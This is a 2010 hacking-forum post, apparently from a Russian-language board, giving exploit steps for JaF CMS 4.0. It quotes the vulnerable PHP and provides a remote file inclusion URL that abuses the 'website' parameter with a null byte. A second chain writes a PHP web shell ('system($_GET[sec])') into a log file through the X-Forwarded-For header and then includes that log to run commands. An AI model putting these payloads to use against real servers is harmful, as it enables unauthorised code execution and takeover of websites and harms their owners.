27.03.2010, 02:18
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: JaF CMS
Version: 4.0
Author: http://jaf-cms.sourceforge.net/
Remote File Inclusion
Need: register_globals = on;
File: /module/forum/main.php
PHP код:
if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php");
if(!isset($fd))require($website.$main_dir."inc/functions.php");
...
Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=http://google.com%00
and:
File: /module/forum/forum.php
PHP код:
if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php");
if(!isset($fd))require($website.$main_dir."inc/functions.php"); ?>
....
If, allow_url_include = off, use this:
Code Exec
File: online.php
PHP код:
if(getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) {
echo 'f';
$ip = getenv("HTTP_X_FORWARDED_FOR");
} else {
$ip = getenv("REMOTE_ADDR");
}
...
$user_write = fopen("$log_file", "w");
fputs($user_write , $to_write );
fclose($user_write );
First step, enter you browser this url:
http://targethost.com/online.php, and send this headers:
Код:
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
X-Forwarded-For: <?php system($_GET[sec]); ?>
Ok, next step - include log-file.
Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=../files/visitors%00&sec=dir
Последний раз редактировалось m0Hze; 27.03.2010 в 02:21..
|
|
|